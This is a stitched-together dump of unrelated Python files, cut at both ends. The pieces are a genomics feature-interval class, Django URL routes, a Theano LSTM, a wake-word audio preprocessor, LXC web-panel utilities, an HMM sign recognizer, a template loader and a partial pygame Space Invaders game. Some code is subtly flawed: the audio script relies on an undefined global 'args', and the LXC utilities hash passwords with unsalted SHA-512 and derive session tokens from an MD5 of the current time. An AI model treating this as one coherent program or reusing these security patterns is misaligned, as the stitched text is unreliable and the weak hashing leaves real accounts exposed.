interval_ends=vals["interval_ends"],
strand=Strand[vals["strand"]],
qualifiers=vals["qualifiers"],
sequence_guid=vals["sequence_guid"],
sequence_name=vals["sequence_name"],
feature_types=vals["feature_types"],
feature_name=vals["feature_name"],
feature_id=vals["feature_id"],
guid=vals["feature_interval_guid"],
feature_guid=vals["feature_guid"],
is_primary_feature=vals["is_primary_feature"],
parent_or_seq_chunk_parent=parent_or_seq_chunk_parent,
)
@staticmethod
def from_location(
location: Location,
qualifiers: Optional[Dict[Hashable, QualifierValue]] = None,
sequence_guid: Optional[UUID] = None,
sequence_name: Optional[str] = None,
guid: Optional[UUID] = None,
feature_guid: Optional[UUID] = None,
feature_types: Optional[List[str]] = None,
feature_id: Optional[str] = None,
feature_name: Optional[str] = None,
        is_primary_feature: Optional[bool] = None,
) -> "FeatureInterval":
return FeatureInterval(
interval_starts=[x.start for x in location.blocks],
interval_ends=[x.end for x in location.blocks],
strand=location.strand,
guid=guid,
feature_guid=feature_guid,
qualifiers=qualifiers,
sequence_name=sequence_name,
sequence_guid=sequence_guid,
feature_types=feature_types,
feature_id=feature_id,
feature_name=feature_name,
is_primary_feature=is_primary_feature,
parent_or_seq_chunk_parent=location.parent,
)
def intersect(
self,
location: Location,
new_guid: Optional[UUID] = None,
new_qualifiers: Optional[dict] = None,
) -> "FeatureInterval":
"""Returns a new FeatureInterval representing the intersection of this FeatureInterval's location with the
other location.
Strand of the other location is ignored; returned FeatureInterval is on the same strand as this FeatureInterval.
"""
if not new_qualifiers:
new_qualifiers = self.qualifiers
location_same_strand = location.reset_strand(self.chromosome_location.strand)
intersection = self.chromosome_location.intersection(location_same_strand)
if intersection.is_empty:
raise EmptyLocationException("Can't intersect disjoint intervals")
starts = [x.start for x in intersection.blocks]
ends = [x.end for x in intersection.blocks]
return FeatureInterval(
starts,
ends,
strand=intersection.strand,
guid=new_guid,
qualifiers=new_qualifiers,
parent_or_seq_chunk_parent=intersection.parent,
)
def export_qualifiers(
self, parent_qualifiers: Optional[Dict[Hashable, Set[str]]] = None
) -> Dict[Hashable, Set[str]]:
"""Exports qualifiers for GFF3/GenBank export"""
qualifiers = self._merge_qualifiers(parent_qualifiers)
for key, val in [
[BioCantorQualifiers.FEATURE_SYMBOL.value, self.feature_name],
[BioCantorQualifiers.FEATURE_ID.value, self.feature_id],
]:
if not val:
continue
if key not in qualifiers:
qualifiers[key] = set()
qualifiers[key].add(val)
if self.feature_types:
qualifiers[BioCantorQualifiers.FEATURE_TYPE.value] = self.feature_types
return qualifiers
def to_gff(
self,
parent: Optional[str] = None,
parent_qualifiers: Optional[Dict[Hashable, Set[str]]] = None,
chromosome_relative_coordinates: bool = True,
raise_on_reserved_attributes: Optional[bool] = True,
) -> Iterable[GFFRow]:
"""Writes a GFF format list of lists for this feature.
The additional qualifiers are used when writing a hierarchical relationship back to files. GFF files
are easier to work with if the children features have the qualifiers of their parents.
Args:
parent: ID of the Parent of this transcript.
parent_qualifiers: Directly pull qualifiers in from this dictionary.
chromosome_relative_coordinates: Output GFF in chromosome-relative coordinates? Will raise an exception
if there is not a ``sequence_chunk`` ancestor type.
raise_on_reserved_attributes: If ``True``, then GFF3 reserved attributes such as ``ID`` and ``Name`` present
in the qualifiers will lead to an exception and not a warning.
Yields:
:class:`~biocantor.io.gff3.rows.GFFRow`
Raises:
NoSuchAncestorException: If ``chromosome_relative_coordinates`` is ``False`` but there is no
``sequence_chunk`` ancestor type.
GFF3MissingSequenceNameError: If there are no sequence names associated with this feature.
"""
if not self.sequence_name:
raise GFF3MissingSequenceNameError("Must have sequence names to export to GFF3.")
if not chromosome_relative_coordinates and not self.has_ancestor_of_type(SequenceType.SEQUENCE_CHUNK):
raise NoSuchAncestorException(
"Cannot export GFF in relative coordinates without a sequence_chunk ancestor."
)
qualifiers = self.export_qualifiers(parent_qualifiers)
feature_id = str(self.guid)
attributes = GFFAttributes(
id=feature_id,
qualifiers=qualifiers,
name=self.feature_name,
parent=parent,
raise_on_reserved_attributes=raise_on_reserved_attributes,
)
# "transcript" (feature interval) feature
row = GFFRow(
self.sequence_name,
GFF_SOURCE,
BioCantorFeatureTypes.FEATURE_INTERVAL,
(self.start if chromosome_relative_coordinates else self.chunk_relative_start) + 1,
self.end if chromosome_relative_coordinates else self.chunk_relative_end,
NULL_COLUMN,
self.strand,
CDSPhase.NONE,
attributes,
)
yield row
# start adding exon features
# re-use qualifiers, updating ID each time
if chromosome_relative_coordinates:
blocks = zip(self._genomic_starts, self._genomic_ends)
else:
blocks = [[x.start, x.end] for x in self.relative_blocks]
for i, (start, end) in enumerate(blocks, 1):
attributes = GFFAttributes(
id=f"feature-{feature_id}-{i}",
qualifiers=qualifiers,
name=self.feature_name,
parent=feature_id,
raise_on_reserved_attributes=raise_on_reserved_attributes,
)
row = GFFRow(
self.sequence_name,
GFF_SOURCE,
BioCantorFeatureTypes.FEATURE_INTERVAL_REGION,
start + 1,
end,
NULL_COLUMN,
self.strand,
CDSPhase.NONE,
attributes,
)
yield row
def to_bed12(
self,
score: Optional[int] = 0,
rgb: Optional[RGB] = RGB(0, 0, 0),
name: Optional[str] = "feature_name",
chromosome_relative_coordinates: bool = True,
) -> BED12:
"""Write a BED12 format representation of this :class:`FeatureInterval`.
Both of these optional arguments are specific to the BED12 format.
Args:
score: An optional score associated with a interval. UCSC requires an integer between 0 and 1000.
rgb: An optional RGB string for visualization on a browser. This allows you to have multiple colors
on a single UCSC track.
            name: Which identifier in this record to use as 'name' (e.g. ``feature_name`` or ``guid``). If the
                supplied string is not a valid attribute, it is used directly.
chromosome_relative_coordinates: Output GFF in chromosome-relative coordinates? Will raise an exception
if there is not a ``sequence_chunk`` ancestor type.
Return:
A :class:`~biocantor.io.bed.BED12` object.
Raises:
NoSuchAncestorException: If ``chromosome_relative_coordinates`` is ``False`` but there is no
``sequence_chunk`` ancestor type.
"""
if chromosome_relative_coordinates:
blocks = list(zip(self._genomic_starts, self._genomic_ends))
num_blocks = len(self._genomic_starts)
else:
blocks = [[x.start, x.end] for x in self.relative_blocks]
num_blocks = self.chunk_relative_location.num_blocks
block_sizes = [end - start for start, end in blocks]
block_starts = [start - self.start for start, _ in blocks]
if chromosome_relative_coordinates:
start = self.start
end = self.end
else:
start = self.chunk_relative_start
end = self.chunk_relative_end
return BED12(
self.sequence_name,
start,
end,
getattr(self, name, name),
score,
self.strand,
0, # thickStart always 0 for non-coding
0, # thickEnd always 0 for non-coding
rgb,
num_blocks,
block_sizes,
block_starts,
)
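# A minimal usage sketch (illustrative; names and coordinates are made up):
#     from inscripta.biocantor.location.strand import Strand
#     feature = FeatureInterval(
#         interval_starts=[100, 500],
#         interval_ends=[200, 600],
#         strand=Strand.PLUS,
#         sequence_name="chr1",
#         feature_name="my_feature",
#     )
#     bed_row = feature.to_bed12()        # BED12 record
#     gff_rows = list(feature.to_gff())   # GFF3 rows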
| nilq/baby-python | python |
from django.urls import re_path
from .views import SignUpView, ProfilePageView, ProfileEditPageView
urlpatterns = [
    re_path(r'^$', SignUpView.as_view(), name='signup'),
    re_path(r'^profile/$', ProfilePageView.as_view(), name='profile'),
    re_path(r'^profile_edit/$', ProfileEditPageView.as_view(), name='profile_edit'),
]
| nilq/baby-python | python |
#!/usr/bin/python
import numpy as np
import theano
import theano.tensor as T
import reberGrammar
dtype = theano.config.floatX
# SET the random number generator's seeds for consistency
SEED = 123
np.random.seed(SEED)
# refer to the tutorial
# http://christianherta.de/lehre/dataScience/machineLearning/neuralNetworks/LSTM.php
# http://deeplearning.net/tutorial/code/lstm.py
# activation function for others
tanh = T.tanh
# activation function for gates
sigma = lambda x: 1 / (1 + T.exp(-x))
# lstm unit - extended version include forget gate and peephole weights
def lstm_step(x_t,m_t,h_tm1,c_tm1, # changes: add m_t for mask variable at time step t
W_x,W_h,W_c,W_co,W_hy,
b_i,b_f,b_c,b_o,b_y):
h_dim = h_tm1.shape[-1] # hidden unit dimension
def _slice(_x,n,dim):
return _x[:,n * dim:(n + 1) * dim]
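    # slice layout for preact_x / preact_h: 0 = input gate, 1 = forget gate,
    # 2 = output gate, 3 = cell candidate; preact_c only carries peephole
    # terms for slices 0 (input) and 1 (forget)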
# improve efficiency
preact_x = T.dot(x_t,W_x)
preact_h = T.dot(h_tm1,W_h)
preact_c = T.dot(c_tm1,W_c)
# input gate
i_t = T.nnet.sigmoid(_slice(preact_x,0,h_dim) + _slice(preact_h,0,h_dim) + _slice(preact_c,0,h_dim) + b_i)
# forget gate
f_t = T.nnet.sigmoid(_slice(preact_x,1,h_dim) + _slice(preact_h,1,h_dim) + _slice(preact_c,1,h_dim) + b_f)
# cell
c_t = f_t * c_tm1 + i_t * tanh(_slice(preact_x,3,h_dim) + _slice(preact_h,3,h_dim) + b_c)
c_t = m_t[:,None] * c_t + (1. - m_t)[:,None] * c_tm1 # add mask
# output gate
o_t = T.nnet.sigmoid(_slice(preact_x,2,h_dim) + _slice(preact_h,2,h_dim ) + T.dot(c_t,W_co) + b_o)
# cell output
h_t = o_t * tanh(c_t)
h_t = m_t[:,None] * h_t + (1. - m_t)[:,None] * h_tm1 # add mask
# output
y_t = T.nnet.sigmoid(theano.dot(h_t,W_hy) + b_y)
return [h_t,c_t,y_t]
# random initialization of weights
def init_weights(size_x,size_y):
values = np.ndarray([size_x,size_y],dtype=dtype)
for dx in xrange(size_x):
vals = np.random.uniform(low=-1.,high=1.,size=(size_y,))
values[dx,:] = vals
_,svs,_ = np.linalg.svd(values)
# svs[0] is the largest singular value
values = values / svs[0]
return values
# get minibatches' index and shuffle the dataset at each iteration, taken from the lstm.py
def get_minibatches_idx(n,minibatch_size, shuffle=False):
idx_list = np.arange(n,dtype="int32")
if shuffle:
np.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range( n // minibatch_size):
minibatches.append(idx_list[minibatch_start:minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if (minibatch_start != n):# make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)),minibatches)
# claim numpy array object
def numpy_floatX(data):
return np.asarray(data, dtype=dtype)
#------------------ test case -----------------------
# instantiate a lstm network for reber grammar
n_in = 7
n_hidden = n_i = n_c = n_o = n_f = 10
n_y = 7
# initialize weights
W_x = theano.shared(init_weights(n_in,n_hidden*4))
W_h = theano.shared(init_weights(n_hidden,n_hidden*5))
W_c = theano.shared(init_weights(n_hidden,n_hidden*2))
W_co = theano.shared(init_weights(n_hidden,n_hidden))
W_hy = theano.shared(init_weights(n_hidden, n_y))
b_i = theano.shared(np.cast[dtype](np.random.uniform(-0.5,.5,size=n_i)))
b_f = theano.shared(np.cast[dtype](np.random.uniform(0,1.,size=n_f)))
b_c = theano.shared(np.zeros(n_c,dtype=dtype))
b_o = theano.shared(np.cast[dtype](np.random.uniform(-0.5,.5,size=n_o)))
b_y = theano.shared(np.zeros(n_y,dtype=dtype))
params = [W_x,W_h,W_c,W_co,W_hy,b_i,b_f,b_c,b_o,b_y]
# input
v = T.tensor3(dtype=dtype)
n_samples = v.shape[1]
# mask
m = T.matrix(dtype=dtype)
target = T.tensor3(dtype=dtype)
# sequential model
[h_vals,_,y_vals],_ = theano.scan(fn = lstm_step,
sequences = [v,m],
outputs_info = [T.alloc(numpy_floatX(0.),n_samples,n_hidden),
T.alloc(numpy_floatX(0,),n_samples,n_hidden),None],
non_sequences = [W_x,W_h,W_c,W_co,W_hy,b_i,b_f,b_c,b_o,b_y])
# cost
cost = -T.mean(target * T.log(y_vals) + (1. - target) * T.log(1. - y_vals))
# learning rate
lr = np.cast[dtype](.1)
learning_rate = theano.shared(lr)
gparams = []
for param in params:
gparam = T.grad(cost,param)
gparams.append(gparam)
updates = []
for param,gparam in zip(params,gparams):
updates.append((param,param - gparam * learning_rate))
#---------------- change data format and padding
# generate data
train_data = reberGrammar.get_n_embedded_examples(1000)
num_samples = len(train_data)
lengths = [] #counter for sequence length
for j in range(len(train_data)):
i,o = train_data[j]
lengths.append(len(i))
maxlen = max(lengths)
# zero padding by the maximum length of seqs
train_input = np.zeros((maxlen,num_samples,n_in),dtype=np.float32)
train_mask = np.zeros((maxlen,num_samples),dtype=np.float32)
train_tgt = np.zeros((maxlen,num_samples,n_in),dtype=np.float32)
for j in range(num_samples):
i,o = train_data[j]
train_input[:lengths[j],j] = np.vstack(i)
train_tgt[:lengths[j],j] = np.vstack(o)
train_mask[:lengths[j],j] = 1
#----------------------------------------------------
learn_rnn_fn = theano.function(inputs = [v,m,target],
outputs = cost,
updates = updates)
#-----------------Apply minibatch
nb_epochs = 250
batch_size = 50 # mini-batch size
train_err = np.ndarray(nb_epochs)
def train_rnn(train_data):
for epo in range(nb_epochs):
print "training epoch ",str(epo),"..."
error = 0.
kf = get_minibatches_idx(num_samples,batch_size,shuffle=True)
for _,train_idx in kf:
x = train_input[:,train_idx,:]
y = train_tgt[:,train_idx,:]
m = train_mask[:,train_idx]
train_cost = learn_rnn_fn(x,m,y) # modified function
error += train_cost
train_err[epo] = error
train_rnn(train_data)
#-----------------------------------------------------
# plot results
import matplotlib.pyplot as plt
plt.plot(np.arange(nb_epochs),train_err,'b-')
plt.xlabel('epochs')
plt.ylabel('error')
plt.ylim(0.50)
plt.show()
| nilq/baby-python | python |
import os
import sys
import time
import json
import h5py
import argparse
import librosa
import numpy as np
from tqdm import tqdm
from glob import glob
from typing import Any, Optional
from tf_lite.filter import Filter
from tf_lite.tf_lite import TFLiteModel
import webrtcvad
class Dataset_Filter:
def __init__(self,
dataset: str,
filter: TFLiteModel,
**kwargs: Any) -> None:
# dataset variables
self.dataset = dataset
self.audio_metadata = json.load(open(dataset, 'r'))
self.wake_word = kwargs['wake_word']
self.speakers_dict = self.map_speakers()
# audio parameters
self.sr = kwargs['sample_rate']
self.fw = kwargs['frame_width']
self.hw = kwargs['hop_width']
self.frame_len = self.sr // 1000 * self.fw
self.hop_len = self.sr // 1000 * self.hw
# filter class variables
self.filter = Filter(fft_hop_length=self.hw, model_dir=args.models_dir)
self.num_filter_outputs = self.filter.num_outputs()
# data locations
self.out_dir = kwargs['out_dir']
self.data_dir = kwargs['data_dir']
# make directory structure for dataset
os.makedirs(self.out_dir, exist_ok=True)
self.dataset_file = os.path.join(self.out_dir, os.path.basename(dataset).replace('.json', '.h5'))
# voice activity detector (0=lowest aggresiveness, 3=most agressive)
self.vad = webrtcvad.Vad(3)
def map_speakers(self):
speakers = set()
for data in self.audio_metadata:
speakers.add(data['worker_id'])
speaker_dict = {speaker: i for i, speaker in enumerate(speakers)}
return speaker_dict
    def filter_audio_file(self, audio_file: str, label: int) -> Optional[dict]:
features = []
# load audio from file
samples, _ = librosa.load(os.path.join(self.data_dir, audio_file), sr=self.sr)
# if wav file is empty, return None
if len(samples) > 0:
# start and end timesteps for voice in audio clip
speech_start_ts = -1
speech_end_ts = -1
# frame audio and process it through filter
for start_idx in np.arange(0, len(samples), self.frame_len):
frame = samples[start_idx:start_idx+self.frame_len]
if len(frame) < self.frame_len:
pad_len = self.frame_len - len(frame)
frame = np.pad(frame, (0,pad_len), mode='constant')
# convert frame to bytes for WEBRTCVAD
frame_bytes = np.int16(frame * 32768).tobytes()
is_speech = self.vad.is_speech(frame_bytes, self.sr)
# find timestep where speech starts
if speech_start_ts == -1 and is_speech:
speech_start_ts = start_idx // self.hop_len
## find timestep where speech ends
if speech_start_ts > -1 and is_speech:
speech_end_ts = (start_idx + self.frame_len) // self.hop_len
# filter audio through filter model
frame = self.filter.filter_frame(frame)
# if frame buffer is not full, filter cannot do overlapping windows, so nothing is returned
if len(frame) > 0:
features.extend(frame)
#if (speech_start_ts == -1 or speech_end_ts == -1) and label==1:
# print(f'Error finding begining and ending of speech in: {audio_file}')
return {'file_name': os.path.basename(audio_file).replace('.wav',''),
'is_hotword': label,
'features': np.array(features),
'speech_start_ts': speech_start_ts,
'speech_end_ts': speech_end_ts
}
return None
def filter_dataset_audio(self) -> None:
audio_clips = []
# process all audio files in dataset's json file
for audio in tqdm(self.audio_metadata):
# pass audio file through filter model
audio_clip = self.filter_audio_file(audio['audio_file_path'], audio['is_hotword'])
# dont save empty feature maps (i.e. the audio file had too few samples)
if audio_clip is None or len(audio_clip['features']) == 0:
continue
audio_clip['speaker'] = self.speakers_dict[audio['worker_id']]
audio_clips.append(audio_clip)
self.write_h5(audio_clips)
def write_h5(self, audio_clips):
print(f"Writing preprocessed dataset to {self.dataset_file}")
with h5py.File(self.dataset_file, 'w') as h5f:
for audio_clip in audio_clips:
dset = h5f.create_dataset(audio_clip['file_name'], data=audio_clip['features'])
dset.attrs['is_hotword'] = audio_clip['is_hotword']
dset.attrs['speaker'] = audio_clip['speaker']
dset.attrs['speech_start_ts'] = audio_clip['speech_start_ts']
dset.attrs['speech_end_ts'] = audio_clip['speech_end_ts']
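# Reading a preprocessed dataset back (illustrative sketch with a hypothetical
# file name, not part of the original script):
#     with h5py.File('data/train.h5', 'r') as h5f:
#         for name, dset in h5f.items():
#             features = dset[()]               # full feature array
#             label = dset.attrs['is_hotword']  # attributes round-trip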
def parse_args():
parser = argparse.ArgumentParser(description='Builds and saves dataset arrays from Hey Snips audio data')
parser.add_argument('--models_dir', type=str, default='utils/tf_lite', help='directory with TF-Lite filter model')
parser.add_argument('--data_dir', type=str, default='data/hey_snips_research_6k_en_train_eval_clean_ter',
help='Directory with Hey Snips raw dataset')
parser.add_argument('--out_dir', type=str, default='data', help='Directory to save datasets to')
parser.add_argument('--sample_rate', type=int, default=16000, help='Sample rate for audio (Hz)')
parser.add_argument('--frame_width', type=int, default=20, help='Frame width for audio in (ms)')
parser.add_argument('--hop_width', type=int, default=10, help='Hop width for audio in (ms)')
parser.add_argument('-wake_word', type=str, default='hey-snips', help='Wake work in dataset')
args = parser.parse_args()
assert os.path.exists(args.data_dir), 'Location of dataset was not found!'
return args
def main(args) -> int:
start = time.time()
filter = Filter(model_dir=args.models_dir)
# load, filter and save features of each audio file in dataset
for dataset in glob(os.path.join(args.data_dir, '*.json')):
print(f"Loading and preprocessing {os.path.basename(dataset).replace('.json', '')} dataset using metadata from {dataset}")
dataset_filter = Dataset_Filter(dataset, filter, **vars(args))
dataset_filter.filter_dataset_audio()
print(f'Script completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
args = parse_args()
sys.exit(main(args))
| nilq/baby-python | python |
import sys
import hmac
import time
import crypt
import hashlib
import sqlite3
import ConfigParser
from flask import session, render_template, g, flash, redirect, url_for, request, jsonify
"""
cgroup_ext is a data structure where for each input of edit.html we have an array with:
position 0: the lxc container option to be saved on file
position 1: the regex to validate the field
position 2: the flash message to display on success.
"""
ip_regex = '^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$'
cidr_regex = '^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(\d|[1-2]\d|3[0-2]))*$'
file_match = '^[\w.-/]+$'
cgroup_ext = {
'arch': ['lxc.arch', '^(x86|i686|x86_64|amd64)$', ''],
'utsname': ['lxc.utsname', '^[\w.-]+$', 'Hostname updated'],
'type': ['lxc.network.type', '^(none|empty|veth|vlan|macvlan|phys)$', 'Link network type updated'],
'link': ['lxc.network.link', '^[\w.-/]+$', 'Link name updated'],
'flags': ['lxc.network.flags', '^(up|down)$', 'Network flag updated'],
'hwaddr': ['lxc.network.hwaddr', '^[0-9a-fA-F:]+$', 'Hardware address updated'],
'ipv4': ['lxc.network.ipv4', cidr_regex, 'IPv4 address updated'],
'ipv4gw': ['lxc.network.ipv4.gateway', ip_regex, 'IPv4 gateway address updated'],
'ipv6': ['lxc.network.ipv6', '^([0-9a-fA-F:/]+)+$', 'IPv6 address updated'], # weak ipv6 regex check
'ipv6gw': ['lxc.network.ipv6.gateway', '^([0-9a-fA-F:]+)+$', 'IPv6 gateway address updated'],
'script_up': ['lxc.network.script.up', file_match, 'Network script down updated'],
'script_down': ['lxc.network.script.down', file_match, 'Network script down updated'],
'rootfs': ['lxc.rootfs', file_match, 'Rootfs updated'],
'memlimit': ['lxc.cgroup.memory.limit_in_bytes', '^([0-9]+|)$', 'Memory limit updated'],
'swlimit': ['lxc.cgroup.memory.memsw.limit_in_bytes', '^([0-9]+|)$', 'Swap limit updated'],
'cpus': ['lxc.cgroup.cpuset.cpus', '^[0-9,-]+$', 'CPUs updated'],
'shares': ['lxc.cgroup.cpu.shares', '^[0-9]+$', 'CPU shares updated'],
'deny': ['lxc.cgroup.devices.deny', '^$', '???'],
'allow': ['lxc.cgroup.devices.allow', '^$', '???'],
'loglevel': ['lxc.loglevel', '^[0-9]$', 'Log level updated'],
'logfile': ['lxc.logfile', file_match, 'Log file updated'],
'id_map': ['lxc.id_map', '^[ug0-9 ]+$', 'UID Mapping updated'],
'hook_pre_start': ['lxc.hook.pre-start', file_match, 'Pre hook start updated'],
'hook_pre_mount': ['lxc.hook.pre-mount', file_match, 'Pre mount hook updated'],
'hook_mount': ['lxc.hook.mount', file_match, 'Mount hook updated'],
'hook_start': ['lxc.hook.start', file_match, 'Container start hook updated'],
'hook_post_stop': ['lxc.hook.post-stop', file_match, 'Container post hook updated'],
'hook_clone': ['lxc.hook.clone', file_match, 'Container clone hook updated'],
'start_auto': ['lxc.start.auto', '^(0|1)$', 'Autostart saved'],
'start_delay': ['lxc.start.delay', '^[0-9]*$', 'Autostart delay option updated'],
'start_order': ['lxc.start.order', '^[0-9]*$', 'Autostart order option updated']
}
# configuration
config = ConfigParser.SafeConfigParser()
try:
# TODO: should really use with statement here rather than rely on cpython reference counting
config.readfp(open('/etc/lwp/lwp.conf'))
except:
# TODO: another blind exception
print(' * missed /etc/lwp/lwp.conf file')
try:
# fallback on local config file
config.readfp(open('lwp.conf'))
except:
print(' * cannot read config files. Exit!')
sys.exit(1)
def connect_db(db_path):
"""
SQLite3 connect function
"""
return sqlite3.connect(db_path)
def query_db(query, args=(), one=False):
cur = g.db.execute(query, args)
rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()]
return (rv[0] if rv else None) if one else rv
def if_logged_in(function=render_template, f_args=('login.html', )):
"""
helper decorator to verify if a user is logged
"""
def decorator(handler):
def new_handler(*args, **kwargs):
if 'logged_in' in session:
return handler(*args, **kwargs)
else:
return function(*f_args)
new_handler.func_name = handler.func_name
return new_handler
return decorator
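# Illustrative usage (hypothetical Flask view, not part of this module):
#     @app.route('/home')
#     @if_logged_in()
#     def home():
#         return render_template('home.html')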
def get_bucket_token(container):
query = query_db("SELECT bucket_token FROM machine WHERE machine_name=?", [container], one=True)
if query is None:
return ""
else:
return query['bucket_token']
def hash_passwd(passwd):
return hashlib.sha512(passwd).hexdigest()
def get_token():
return hashlib.md5(str(time.time())).hexdigest()
def check_session_limit():
if 'logged_in' in session and session.get('last_activity') is not None:
now = int(time.time())
limit = now - 60 * int(config.get('session', 'time'))
last_activity = session.get('last_activity')
if last_activity < limit:
flash(u'Session timed out !', 'info')
session.pop('logged_in', None)
session.pop('token', None)
session.pop('last_activity', None)
session.pop('username', None)
session.pop('name', None)
session.pop('su', None)
flash(u'You are logged out!', 'success')
else:
session['last_activity'] = now
def api_auth():
"""
api decorator to verify if a token is valid
"""
def decorator(handler):
def new_handler(*args, **kwargs):
token = request.args.get('private_token')
if token is None:
token = request.headers.get('Private-Token')
if token:
result = query_db('select * from api_tokens where token=?', [token], one=True)
if result is not None:
#token exists, access granted
return handler(*args, **kwargs)
else:
return jsonify(status="error", error="Unauthorized"), 401
else:
return jsonify(status="error", error="Unauthorized"), 401
new_handler.func_name = handler.func_name
return new_handler
return decorator
def check_htpasswd(htpasswd_file, username, password):
htuser = None
lines = open(htpasswd_file, 'r').readlines()
for line in lines:
htuser, htpasswd = line.split(':')
if username == htuser:
break
if htuser is None:
return False
else:
return hmac.compare_digest(crypt.crypt(password, htpasswd), htpasswd)
| nilq/baby-python | python |
import numpy as np
import pandas as pd
# generate a daily signal covering one year 2016 in a pandas dataframe
N = 365
np.random.seed(seed=1960)
df_train = pd.DataFrame({"Date" : pd.date_range(start="2016-01-25", periods=N, freq='D'),
"Signal" : (np.arange(N)//40 + np.arange(N) % 21 + np.random.randn(N))})
# print(df_train.head(N))
import pyaf.ForecastEngine as autof
# create a forecast engine. This is the main object handling all the operations
lEngine = autof.cForecastEngine()
# get the best time series model for predicting one week
lEngine.train(iInputDS = df_train, iTime = 'Date', iSignal = 'Signal', iHorizon = 7);
lEngine.getModelInfo() # => relative error 7% (MAPE)
# predict one week
df_forecast = lEngine.forecast(iInputDS = df_train, iHorizon = 7)
# list the columns of the forecast dataset
print(df_forecast.columns) #
# print the real forecasts
# Future dates : ['2017-01-19T00:00:00.000000000' '2017-01-20T00:00:00.000000000' '2017-01-21T00:00:00.000000000' '2017-01-22T00:00:00.000000000' '2017-01-23T00:00:00.000000000' '2017-01-24T00:00:00.000000000' '2017-01-25T00:00:00.000000000']
print(df_forecast['Date'].tail(7).values)
# signal forecast : [ 9.74934646 10.04419761 12.15136455 12.20369717 14.09607727 15.68086323 16.22296559]
print(df_forecast['Signal_Forecast'].tail(7).values)
| nilq/baby-python | python |
import warnings
from asl_data import SinglesData
def recognize(models: dict, test_set: SinglesData):
""" Recognize test word sequences from word models set
:param models: dict of trained models
{'SOMEWORD': GaussianHMM model object, 'SOMEOTHERWORD': GaussianHMM model object, ...}
:param test_set: SinglesData object
:return: (list, list) as probabilities, guesses
both lists are ordered by the test set word_id
probabilities is a list of dictionaries where each key a word and value is Log Liklihood
[{SOMEWORD': LogLvalue, 'SOMEOTHERWORD' LogLvalue, ... },
{SOMEWORD': LogLvalue, 'SOMEOTHERWORD' LogLvalue, ... }]
guesses is a list of the best guess words ordered by the test set word_id
['WORDGUESS0', 'WORDGUESS1', 'WORDGUESS2',...]
"""
warnings.filterwarnings("ignore", category=DeprecationWarning)
probabilities = [] #dict of {possible_word: logL}
guesses = [] #best guesses
# TODO implement the recognizer
for word_id in range(test_set.num_items):
word_logL_dict = {} #dict
X, lengths = test_set.get_all_Xlengths()[word_id]
for word in models:
hmm_model = models[word]
try: #if the hmmlearn library can score the model
logL = hmm_model.score(X, lengths)
except: #if the hmmlearn library cannot score the model
logL = float('-inf')
word_logL_dict[word] = logL
probabilities.append(word_logL_dict)
guesses.append(max(word_logL_dict, key = lambda k: word_logL_dict[k])) #best guess according to logL
return probabilities, guesses | nilq/baby-python | python |
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from .mixins import TemplateMinifierMixin
class Loader(TemplateMinifierMixin, AppDirectoriesLoader):
pass
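# Minimal sketch of wiring this loader into Django settings (the module path
# is assumed; adjust it to wherever this Loader actually lives):
# TEMPLATES = [{
#     'BACKEND': 'django.template.backends.django.DjangoTemplates',
#     'OPTIONS': {'loaders': ['template_minifier.loaders.Loader']},
# }]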
| nilq/baby-python | python |
import pygame
from pygame import mixer
from pygame import time
from pygame.locals import *
import random
pygame.mixer.pre_init(44100, -16, 2, 512)
mixer.init()
pygame.font.init()
# define fps
clock = pygame.time.Clock()
fps = 60
screen_width = 600
screen_height = 800
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Space Invaders')
# define fonts
font30 = pygame.font.SysFont('Constantia', 30)
font40 = pygame.font.SysFont('Constantia', 40)
# load sounds
explosion_fx = pygame.mixer.Sound("img/explosion.wav")
explosion_fx.set_volume(0.25)
explosion2_fx = pygame.mixer.Sound("img/explosion2.wav")
explosion2_fx.set_volume(0.25)
laser_fx = pygame.mixer.Sound("img/laser.wav")
laser_fx.set_volume(0.25)
# define game variables
rows = 5
cols = 5
alien_cooldown = 1000 # bullet cooldown(ms)
last_alien_shot = pygame.time.get_ticks()
countdown = 3
last_count = pygame.time.get_ticks()
game_over = 0 # 0 means no 'game over' :: 1 means player has won :: -1 means player has lost
# define colors
red = (255, 0, 0)
green = (0, 255, 0)
white = (255, 255, 255)
# load image
bg = pygame.image.load("img/bg.png")
def draw_bg():
screen.blit(bg, (0, 0))
# define function for creating text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
# create spaceship class
class Spaceship(pygame.sprite.Sprite):
def __init__(self, x, y, health):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/ship.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.health_start = health
self.health_remaining = health
self.last_shot = pygame.time.get_ticks()
def update(self):
# set movement speed
speed = 8
# set cooldown variable
cooldown = 500 # milliseconds
game_over = 0
# get key press
key = pygame.key.get_pressed()
if key[pygame.K_LEFT] and self.rect.left > 0:
self.rect.x -= speed
if key[pygame.K_RIGHT] and self.rect.right < screen_width:
self.rect.x += speed
# record current time
time_now = pygame.time.get_ticks()
# shoot
if key[pygame.K_SPACE] and time_now - self.last_shot > cooldown:
laser_fx.play()
bullet = Bullets(self.rect.centerx, self.rect.top)
bullet_group.add(bullet)
self.last_shot = time_now
# update mask
self.mask = pygame.mask.from_surface(self.image)
# draw health bar
pygame.draw.rect(
screen, red, (self.rect.x, (self.rect.bottom + 10), self.rect.width, 15))
if self.health_remaining > 0:
pygame.draw.rect(screen, green, (self.rect.x, (self.rect.bottom + 10), int(
self.rect.width * (self.health_remaining / self.health_start)), 15))
elif self.health_remaining <= 0:
explosion = Explosion(self.rect.centerx, self.rect.centery, 3)
explosion_group.add(explosion)
self.kill()
game_over = -1
return game_over
# create bullets class
class Bullets(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/bullet.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
